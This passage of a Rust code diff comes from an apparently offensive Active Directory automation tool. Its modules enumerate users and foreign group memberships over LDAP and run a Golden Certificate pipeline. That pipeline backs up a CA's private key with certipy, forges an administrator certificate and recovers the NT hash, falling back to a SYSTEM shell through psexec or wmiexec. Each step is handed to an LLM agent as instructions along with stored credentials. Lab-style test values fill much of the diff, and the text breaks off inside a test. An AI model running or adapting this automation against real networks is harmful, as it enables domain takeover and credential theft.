+            domain: "contoso.local".into(),
+            source: "test".into(),
+            is_admin: false,
+            discovered_at: None,
+            parent_id: None,
+            attack_step: 0,
+        };
+        let payload = json!({
+            "technique": "ldap_user_enumeration",
+            "target_ip": "192.168.58.10",
+            "domain": "contoso.local",
+            "credential": {
+                "username": cred.username,
+
"password": cred.password, + "domain": cred.domain, + }, + "filters": ["(objectCategory=person)(objectClass=user)"], + "attributes": ["sAMAccountName", "description", "memberOf", "userAccountControl", "servicePrincipalName"], + }); + assert_eq!(payload["technique"], "ldap_user_enumeration"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["domain"], "contoso.local"); + } + + #[test] + fn ldap_filter_format() { + let filters = ["(objectCategory=person)(objectClass=user)"]; + assert_eq!(filters.len(), 1); + assert!(filters[0].contains("objectCategory=person")); + assert!(filters[0].contains("objectClass=user")); + } + + #[test] + fn ldap_attributes_list() { + let attrs = [ + "sAMAccountName", + "description", + "memberOf", + "userAccountControl", + "servicePrincipalName", + ]; + assert_eq!(attrs.len(), 5); + assert!(attrs.contains(&"sAMAccountName")); + assert!(attrs.contains(&"servicePrincipalName")); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = UserEnumWork { + dedup_key: "user_enum:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: cred, + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.credential.username, "admin"); + } + + #[test] + fn dedup_key_normalizes_domain() { + let key = format!("user_enum:{}", "CONTOSO.LOCAL".to_lowercase()); + assert_eq!(key, "user_enum:contoso.local"); + } + + #[test] + fn credential_quarantine_check_logic() { + // Empty password should be skipped by the credential selection logic + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "".into(), + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + assert!(cred.password.is_empty()); + } + + #[test] + fn cross_domain_credential_fallback() { + // When no same-domain cred exists, any cred can be used (cross-domain LDAP) + let creds = [ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "fabrikam.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }]; + let target_domain = "contoso.local"; + let same_domain = creds.iter().find(|c| { + c.domain.to_lowercase() == target_domain.to_lowercase() && !c.password.is_empty() + }); + assert!(same_domain.is_none()); + let fallback = creds.iter().find(|c| !c.password.is_empty()); + assert!(fallback.is_some()); + assert_eq!(fallback.unwrap().domain, "fabrikam.local"); + } + + fn make_credential( + username: &str, + password: &str, + domain: &str, + ) -> ares_core::models::Credential { + ares_core::models::Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn collect_empty_state_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_user_enum_work(&state); + 
assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_user_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_domain_with_cred() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_user_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_dedup_skips_processed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_DOMAIN_USER_ENUM, "user_enum:contoso.local".into()); + let work = collect_user_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_cross_domain_fallback() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + // Only fabrikam cred available, should fall back + state + .credentials + .push(make_credential("crossuser", "P@ssw0rd!", "fabrikam.local")); // pragma: allowlist secret + let work = collect_user_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "crossuser"); + assert_eq!(work[0].credential.domain, "fabrikam.local"); + } + + #[test] + fn collect_skips_empty_password() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "", "contoso.local")); + let work = collect_user_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_quarantined_credential_falls_back() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("gooduser", "Pass!456", "fabrikam.local")); // pragma: allowlist secret + state.quarantine_credential("baduser", "contoso.local"); + let work = collect_user_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "gooduser"); + } + + #[test] + fn collect_dedup_key_lowercased() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_user_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dedup_key, "user_enum:contoso.local"); + } + + #[tokio::test] + async fn collect_via_shared_state() { + let shared = SharedState::new("test-op".into()); + { + let mut state = shared.write().await; + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + 
.credentials
+                .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+        }
+        let state = shared.read().await;
+        let work = collect_user_enum_work(&state);
+        assert_eq!(work.len(), 1);
+        assert_eq!(work[0].domain, "contoso.local");
+    }
+}
diff --git a/ares-cli/src/orchestrator/automation/foreign_group_enum.rs b/ares-cli/src/orchestrator/automation/foreign_group_enum.rs
new file mode 100644
index 00000000..02ab73be
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/foreign_group_enum.rs
@@ -0,0 +1,471 @@
+//! auto_foreign_group_enum -- enumerate cross-domain/cross-forest group memberships.
+//!
+//! Discovers foreign security principals (FSPs) — users/groups from one domain
+//! that are members of groups in another domain. This reveals cross-forest and
+//! cross-domain attack paths that BloodHound's intra-domain analysis might miss.
+//!
+//! Dispatches LDAP queries per trust relationship to find:
+//! - Foreign users in local groups (e.g., FABRIKAM\jdoe in CONTOSO\TrustedAdmins)
+//! - Foreign groups nested in local groups
+//! - Domain Local groups with foreign members (the primary FSP container)
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect foreign group enumeration work items from current state.
+///
+/// Pure logic extracted from `auto_foreign_group_enum` so it can be unit-tested
+/// without needing a `Dispatcher` or async runtime.
+fn collect_foreign_group_work(state: &StateInner) -> Vec<ForeignGroupWork> {
+    if state.credentials.is_empty() || state.domains.len() < 2 {
+        return Vec::new();
+    }
+
+    let mut items = Vec::new();
+
+    // For each domain, enumerate foreign security principals
+    for domain in &state.domains {
+        let dedup_key = format!("foreign_group:{domain}");
+        if state.is_processed(DEDUP_FOREIGN_GROUP_ENUM, &dedup_key) {
+            continue;
+        }
+
+        let dc_ip = match state.resolve_dc_ip(domain) {
+            Some(ip) => ip,
+            None => continue,
+        };
+
+        // Find a credential for this domain
+        let cred = state
+            .credentials
+            .iter()
+            .find(|c| {
+                !c.password.is_empty()
+                    && c.domain.to_lowercase() == domain.to_lowercase()
+                    && !state.is_credential_quarantined(&c.username, &c.domain)
+            })
+            .or_else(|| {
+                state.credentials.iter().find(|c| {
+                    !c.password.is_empty()
+                        && !state.is_credential_quarantined(&c.username, &c.domain)
+                })
+            })
+            .cloned();
+
+        let cred = match cred {
+            Some(c) => c,
+            None => continue,
+        };
+
+        items.push(ForeignGroupWork {
+            dedup_key,
+            domain: domain.clone(),
+            dc_ip,
+            credential: cred,
+        });
+    }
+
+    items
+}
+
+/// Enumerate cross-domain foreign group memberships.
+/// Interval: 45s.
+pub async fn auto_foreign_group_enum(
+    dispatcher: Arc<Dispatcher>,
+    mut shutdown: watch::Receiver<bool>,
+) {
+    let mut interval = tokio::time::interval(Duration::from_secs(45));
+    interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+    loop {
+        tokio::select! {
+            _ = interval.tick() => {},
+            _ = shutdown.changed() => break,
+        }
+        if *shutdown.borrow() {
+            break;
+        }
+
+        if !dispatcher.is_technique_allowed("foreign_group_enum") {
+            continue;
+        }
+
+        let work: Vec<ForeignGroupWork> = {
+            let state = dispatcher.state.read().await;
+            collect_foreign_group_work(&state)
+        };
+
+        for item in work {
+            let payload = json!({
+                "technique": "foreign_group_enumeration",
+                "target_ip": item.dc_ip,
+                "domain": item.domain,
+                "credential": {
+                    "username": item.credential.username,
+                    "password": item.credential.password,
+                    "domain": item.credential.domain,
+                },
+                "filters": [
+                    "(objectClass=foreignSecurityPrincipal)",
+                    "(&(objectCategory=group)(groupType:1.2.840.113556.1.4.803:=4))"
+                ],
+                "attributes": [
+                    "sAMAccountName", "member", "memberOf", "objectSid",
+                    "groupType", "cn", "distinguishedName"
+                ],
+                "instructions": concat!(
+                    "Enumerate Foreign Security Principals and cross-domain group memberships. ",
+                    "1) Query CN=ForeignSecurityPrincipals,DC=... to list all foreign SIDs. ",
+                    "2) Resolve each SID to its source domain user/group using ldapsearch against ",
+                    "the source domain's DC. ",
+                    "3) Query Domain Local groups (groupType bit 4) and check for foreign members. ",
+                    "4) Report each cross-domain membership: source_domain\\source_user -> target_group ",
+                    "(target_domain). These are critical for cross-forest attack paths. ",
+                    "5) Register any discovered cross-domain memberships as vulnerabilities with ",
+                    "vuln_type='foreign_group_membership', source=foreign_user, target=local_group, ",
+                    "domain=target_domain, source_domain=foreign_domain.\n\n",
+                    "IMPORTANT: For each user discovered during FSP enumeration, include them in the ",
+                    "discovered_users array with EXACTLY this JSON format:\n",
+                    "  {\"username\": \"samaccountname\", \"domain\": \"domain.local\", ",
+                    "\"source\": \"foreign_group_enumeration\", \"memberOf\": [\"Group1\"]}\n",
+                    "Include ALL users found — both foreign principals and local group members."
+ ), + }); + + let priority = dispatcher.effective_priority("foreign_group_enum"); + match dispatcher + .throttled_submit("recon", "recon", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + "Foreign group enumeration dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_FOREIGN_GROUP_ENUM, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_FOREIGN_GROUP_ENUM, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(domain = %item.domain, "Foreign group enum deferred"); + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch foreign group enum"); + } + } + } + } +} + +struct ForeignGroupWork { + dedup_key: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_key_format() { + let key = format!("foreign_group:{}", "contoso.local"); + assert_eq!(key, "foreign_group:contoso.local"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_FOREIGN_GROUP_ENUM, "foreign_group_enum"); + } + + #[test] + fn requires_multiple_domains() { + let domains: Vec<String> = vec!["contoso.local".to_string()]; + assert!( + domains.len() < 2, + "Single domain should skip foreign group enum" + ); + } + + #[test] + fn two_domains_meets_requirement() { + let domains: Vec<String> = vec!["contoso.local".to_string(), "fabrikam.local".to_string()]; + assert!(domains.len() >= 2); + } + + #[test] + fn payload_structure_has_correct_technique() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let payload = json!({ + "technique": "foreign_group_enumeration", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + assert_eq!(payload["technique"], "foreign_group_enumeration"); + assert_eq!(payload["target_ip"], "192.168.58.10"); + assert_eq!(payload["domain"], "contoso.local"); + assert_eq!(payload["credential"]["username"], "admin"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = ForeignGroupWork { + dedup_key: "foreign_group:contoso.local".into(), + domain: "contoso.local".into(), + dc_ip: "192.168.58.10".into(), + credential: cred, + }; + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.dc_ip, "192.168.58.10"); + assert_eq!(work.credential.username, "admin"); + } + + #[test] + fn dedup_key_per_domain() { + let key1 = format!("foreign_group:{}", "contoso.local"); + let key2 = format!("foreign_group:{}", "fabrikam.local"); + assert_ne!(key1, key2); + } + + #[test] + fn foreign_security_principal_resolution() { + // The payload includes credential for cross-domain FSP resolution + let payload = json!({ + "technique": "foreign_group_enumeration", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": "admin", + "password": "P@ssw0rd!",
"domain": "contoso.local", + }, + }); + // FSP resolution happens via the credential against the target domain + assert!(payload.get("credential").is_some()); + assert_eq!(payload["technique"], "foreign_group_enumeration"); + } + + fn make_credential( + username: &str, + password: &str, + domain: &str, + ) -> ares_core::models::Credential { + ares_core::models::Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn collect_empty_state_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_foreign_group_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_domain_no_work() { + let mut state = StateInner::new("test-op".into()); + state.domains.push("contoso.local".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_foreign_group_work(&state); + // Requires at least 2 domains + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_no_work() { + let mut state = StateInner::new("test-op".into()); + state.domains.push("contoso.local".into()); + state.domains.push("fabrikam.local".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + let work = collect_foreign_group_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_two_domains_with_creds() { + let mut state = StateInner::new("test-op".into()); + state.domains.push("contoso.local".into()); + state.domains.push("fabrikam.local".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("fadmin", "Pass!456", "fabrikam.local")); // pragma: allowlist secret + let work = collect_foreign_group_work(&state); + assert_eq!(work.len(), 2); + } + + #[test] + fn collect_dedup_skips_processed() { + let mut state = StateInner::new("test-op".into()); + state.domains.push("contoso.local".into()); + state.domains.push("fabrikam.local".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed( + DEDUP_FOREIGN_GROUP_ENUM, + "foreign_group:contoso.local".into(), + ); + let work = collect_foreign_group_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "fabrikam.local"); + } + + #[test] + fn collect_skips_domain_without_dc() { + let mut state = StateInner::new("test-op".into()); + state.domains.push("contoso.local".into()); + state.domains.push("fabrikam.local".into()); + // Only contoso has a DC + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // 
pragma: allowlist secret + let work = collect_foreign_group_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + } + + #[test] + fn collect_quarantined_credential_falls_back() { + let mut state = StateInner::new("test-op".into()); + state.domains.push("contoso.local".into()); + state.domains.push("fabrikam.local".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("baduser", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("gooduser", "Pass!456", "fabrikam.local")); // pragma: allowlist secret + state.quarantine_credential("baduser", "contoso.local"); + let work = collect_foreign_group_work(&state); + // Both domains should still get work (gooduser fallback for contoso) + assert_eq!(work.len(), 2); + // contoso should fall back to gooduser + let contoso_work = work.iter().find(|w| w.domain == "contoso.local").unwrap(); + assert_eq!(contoso_work.credential.username, "gooduser"); + } + + #[test] + fn collect_skips_empty_password() { + let mut state = StateInner::new("test-op".into()); + state.domains.push("contoso.local".into()); + state.domains.push("fabrikam.local".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "", "contoso.local")); + let work = collect_foreign_group_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_via_shared_state() { + let shared = SharedState::new("test-op".into()); + { + let mut state = shared.write().await; + state.domains.push("contoso.local".into()); + state.domains.push("fabrikam.local".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_foreign_group_work(&state); + assert_eq!(work.len(), 2); + } +} diff --git a/ares-cli/src/orchestrator/automation/golden_cert.rs b/ares-cli/src/orchestrator/automation/golden_cert.rs new file mode 100644 index 00000000..c643cf49 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/golden_cert.rs @@ -0,0 +1,525 @@ +//! auto_golden_cert -- forge a Golden Certificate after owning an ADCS CA host. +//! +//! When a CA host is fully owned (local SYSTEM via lateral movement) and the +//! CA's domain is not yet dominated, drive the offline Golden Certificate +//! pipeline: +//! +//! 1. **Backup**: `certipy ca -backup` extracts the CA private key + cert +//! to a PFX (requires SYSTEM/local admin or CA admin rights — owning the +//! CA host satisfies this). +//! 2. **Forge**: `certipy forge -ca-pfx <backup.pfx> -upn administrator@<domain>` +//! produces a client-auth certificate signed by the CA, for any UPN. +//! No DC interaction is needed — purely offline. +//! 3. **Auth**: `certipy auth -pfx forged.pfx -dc-ip <dc-ip>` performs PKINIT +//! to obtain the target user's NT hash. +//! +//! This is the universal terminal for cross-forest compromise: every ADCS- +//! adjacent attack path (ESC1/ESC4/ESC8, MSSQL→xp_cmdshell→host, RBCD →
S4U → SYSTEM, shadow creds → admin → host) converges here once the CA + host is owned, regardless of which forest the CA lives in. +//! +//! Cross-forest note: the CA's *own* domain credential is what we need for + the `certipy ca -backup` RPC call. We pull it via `find_source_credential` + / `find_trust_credential` so a cred from the originating forest works + when there is no same-domain cred yet. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Watches for owned CA hosts and dispatches Golden Certificate pipelines. +/// Interval: 30s. +pub async fn auto_golden_cert(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) { + let mut interval = tokio::time::interval(Duration::from_secs(30)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("golden_cert") { + continue; + } + + let work: Vec<GoldenCertWork> = { + let state = dispatcher.state.read().await; + collect_golden_cert_work(&state) + }; + + for item in work { + let mut payload = json!({ + "technique": "golden_cert", + "ca_host": item.ca_host, + "ca_hostname": item.ca_hostname, + "domain": item.domain, + "target_user": "administrator", + "target_upn": format!("administrator@{}", item.domain), + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + "username": item.credential.username, + "password": item.credential.password, + "objectives": [ + "Step 1 (backup): run `certipy_ca` with backup=true, ca=<ca-name>, username/password from credential, dc_ip=<dc-ip>. Requires SYSTEM or CA admin on the CA host — since this host is owned, you can also run a SYSTEM shell (psexec/wmiexec) and execute certipy locally.", + "Step 2 (forge): run `certipy_forge` with ca_pfx=<backup.pfx>, upn=`administrator@<domain>`.
Output is a forged client-auth certificate signed by the CA private key — no DC interaction needed.", + "Step 3 (auth): run `certipy_auth` with pfx_path=<forged.pfx>, domain=<domain>, dc_ip=<dc-ip> to PKINIT-authenticate as administrator and recover the NT hash.", + "If you don't yet know the CA name, run `certipy_find` first against this host to discover it (the CA's `Name` / `DNS Name`).", + "If `certipy_ca -backup` fails with an RPC/perm error from a network cred, fall back to a local SYSTEM shell (psexec/wmiexec to ca_host) and run certipy from there — the host is owned.", + ], + }); + + if let Some(ref dc) = item.dc_ip { + payload["dc_ip"] = json!(dc); + payload["target_ip"] = json!(dc); + } + if let Some(ref ca_name) = item.ca_name { + payload["ca_name"] = json!(ca_name); + } + if let Some(ref sid) = item.domain_sid { + payload["domain_sid"] = json!(sid); + payload["admin_sid"] = json!(format!("{sid}-500")); + } + + let priority = dispatcher.effective_priority("golden_cert"); + match dispatcher + .throttled_submit("exploit", "credential_access", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + ca_host = %item.ca_host, + domain = %item.domain, + "Golden Certificate pipeline dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_GOLDEN_CERT, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_GOLDEN_CERT, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(ca_host = %item.ca_host, "Golden Cert deferred by throttler"); + } + Err(e) => { + warn!(err = %e, ca_host = %item.ca_host, "Failed to dispatch Golden Cert"); + } + } + } + } +} + +/// Pure logic so it can be unit-tested without a `Dispatcher` or runtime. +fn collect_golden_cert_work(state: &StateInner) -> Vec<GoldenCertWork> { + state + .hosts + .iter() + .filter(|h| h.owned) + .filter_map(|h| { + let host_lower = h.ip.to_lowercase(); + let hostname_lower = h.hostname.to_lowercase(); + + let is_ca = state.shares.iter().any(|s| { + s.name.to_lowercase() == "certenroll" + && (s.host == h.ip || s.host.to_lowercase() == hostname_lower) + }); + if !is_ca { + return None; + } + + let domain = extract_domain_from_fqdn(&h.hostname).and_then(|d| { + if state.domains.iter().any(|known| known.to_lowercase() == d) { + Some(d) + } else { + state + .domains + .iter() + .find(|known| d.ends_with(&format!(".{}", known.to_lowercase()))) + .or_else(|| { + state + .domains + .iter() + .find(|known| known.to_lowercase().ends_with(&format!(".{d}"))) + }) + .cloned() + .or(Some(d)) + } + })?; + + // Don't forge a Golden Cert against a domain we already own. + if state.dominated_domains.contains(&domain) { + return None; + } + + let dedup_key = format!("{}:{}", host_lower, domain.to_lowercase()); + if state.is_processed(DEDUP_GOLDEN_CERT, &dedup_key) { + return None; + } + + // The certipy_ca call needs a credential that authenticates to the + // CA host's domain. Try same-domain first, then trusted-domain + // (cross-forest) as fallback.
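+ // Illustrative fallback order (hypothetical creds, not taken from the state
+ // above): a same-domain CORP\svc beats a cross-forest FAB\admin supplied by
+ // find_trust_credential; machine accounts ("...$"), delegation accounts, and
+ // quarantined creds never qualify for the backup RPC.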
+ let same_domain = state + .credentials + .iter() + .find(|c| { + !c.password.is_empty() + && c.domain.to_lowercase() == domain.to_lowercase() + && !c.username.starts_with('$') + && !state.is_delegation_account(&c.username) + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .cloned(); + + let credential = same_domain.or_else(|| state.find_trust_credential(&domain))?; + + let dc_ip = state + .domain_controllers + .get(&domain.to_lowercase()) + .cloned(); + + let domain_sid = state.domain_sids.get(&domain.to_lowercase()).cloned(); + + let ca_name = lookup_ca_name(state, &h.ip, &h.hostname); + + Some(GoldenCertWork { + ca_host: h.ip.clone(), + ca_hostname: h.hostname.clone(), + dedup_key, + domain, + dc_ip, + domain_sid, + ca_name, + credential, + }) + }) + .collect() +} + +/// Extract the domain portion of an FQDN ("ca01.contoso.local" -> "contoso.local"). +fn extract_domain_from_fqdn(fqdn: &str) -> Option<String> { + fqdn.to_lowercase() + .split_once('.') + .map(|(_, d)| d.to_string()) +} + +/// Look up a CA name from previously-discovered ADCS vulns on this host. +/// Falls back to None if no `certipy_find` result has populated `ca_name` yet — +/// the LLM agent is instructed to run certipy_find first when this is missing. +fn lookup_ca_name(state: &StateInner, host_ip: &str, hostname: &str) -> Option<String> { + let host_l = host_ip.to_lowercase(); + let hn_l = hostname.to_lowercase(); + state + .discovered_vulnerabilities + .values() + .filter(|v| { + let t = v.target.to_lowercase(); + t == host_l || t == hn_l + }) + .find_map(|v| { + for key in &["ca_name", "CA", "ca"] { + if let Some(s) = v.details.get(*key).and_then(|x| x.as_str()) { + if !s.is_empty() { + return Some(s.to_string()); + } + } + } + None + }) +} + +struct GoldenCertWork { + ca_host: String, + ca_hostname: String, + dedup_key: String, + domain: String, + dc_ip: Option<String>, + domain_sid: Option<String>, + ca_name: Option<String>, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + use ares_core::models::{Credential, Host, Share}; + + fn make_credential(username: &str, password: &str, domain: &str) -> Credential { + Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_host(ip: &str, hostname: &str, owned: bool) -> Host { + Host { + ip: ip.into(), + hostname: hostname.into(), + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc: false, + owned, + } + } + + fn make_share(host: &str, name: &str) -> Share { + Share { + host: host.into(), + name: name.into(), + permissions: String::new(), + comment: String::new(), + } + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_GOLDEN_CERT, "golden_cert"); + } + + #[test] + fn extract_domain_typical() { + assert_eq!( + extract_domain_from_fqdn("ca01.contoso.local"), + Some("contoso.local".to_string()) + ); + } + + #[test] + fn extract_domain_case_insensitive() { + assert_eq!( + extract_domain_from_fqdn("CA01.CONTOSO.LOCAL"), + Some("contoso.local".to_string()) + ); + } + + #[test] + fn extract_domain_bare_hostname() { + assert_eq!(extract_domain_from_fqdn("ca01"), None); + } + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_golden_cert_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_unowned_ca_host_skipped() {
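+ // A CertEnroll share marks the host below as a CA, but owned=false, so
+ // the collector must not emit Golden Certificate work for it.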
let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", false)); + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_golden_cert_work(&state); + assert!(work.is_empty(), "unowned CA host should not yield work"); + } + + #[test] + fn collect_owned_non_ca_host_skipped() { + let mut state = StateInner::new("test-op".into()); + // Owned host but no CertEnroll share + state + .hosts + .push(make_host("192.168.58.20", "fs01.contoso.local", true)); + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_golden_cert_work(&state); + assert!(work.is_empty(), "non-CA owned host should not yield work"); + } + + #[test] + fn collect_owned_ca_with_same_domain_cred_yields_work() { + let mut state = StateInner::new("test-op".into()); + state.shares.push(make_share("192.168.58.50", "CertEnroll")); + state + .hosts + .push(make_host("192.168.58.50", "ca01.contoso.local", true)); + state.domains.push("contoso.local".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_golden_cert_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].ca_host, "192.168.58.50"); + assert_eq!(work[0].ca_hostname, "ca01.contoso.local"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].dedup_key, "192.168.58.50:contoso.local"); + } + + #[test] + fn 